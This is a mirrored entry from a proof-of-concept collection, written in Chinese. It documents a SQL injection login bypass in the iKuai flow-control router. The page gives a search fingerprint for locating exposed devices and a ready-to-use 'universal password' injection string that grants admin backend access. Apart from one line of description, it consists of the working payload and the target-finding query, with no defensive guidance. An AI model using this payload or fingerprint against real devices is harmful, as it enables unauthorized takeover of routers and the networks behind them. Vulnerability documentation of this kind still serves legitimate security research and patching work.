mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-08 12:25:11 +00:00
32 lines
460 B
Markdown
32 lines
460 B
Markdown
# iKuai 流控路由 SQL注入漏洞
|
||
|
||
## 漏洞描述
|
||
|
||
iKuai 流控路由 存在SQL注入漏洞,可以通过SQL注入漏洞构造万能密码获取路由器后台管理权限
|
||
|
||
## 漏洞影响
|
||
|
||
```
|
||
iKuai 流控路由
|
||
```
|
||
|
||
## 网络测绘
|
||
|
||
```
|
||
title="登录爱快流控路由"
|
||
```
|
||
|
||
## 漏洞复现
|
||
|
||
登录页面如下
|
||
|
||
|
||
|
||
使用万能密码登录后台
|
||
|
||
```plain
|
||
user: "or""=""or""="
|
||
pass: 空
|
||
```
|
||
|
||
 |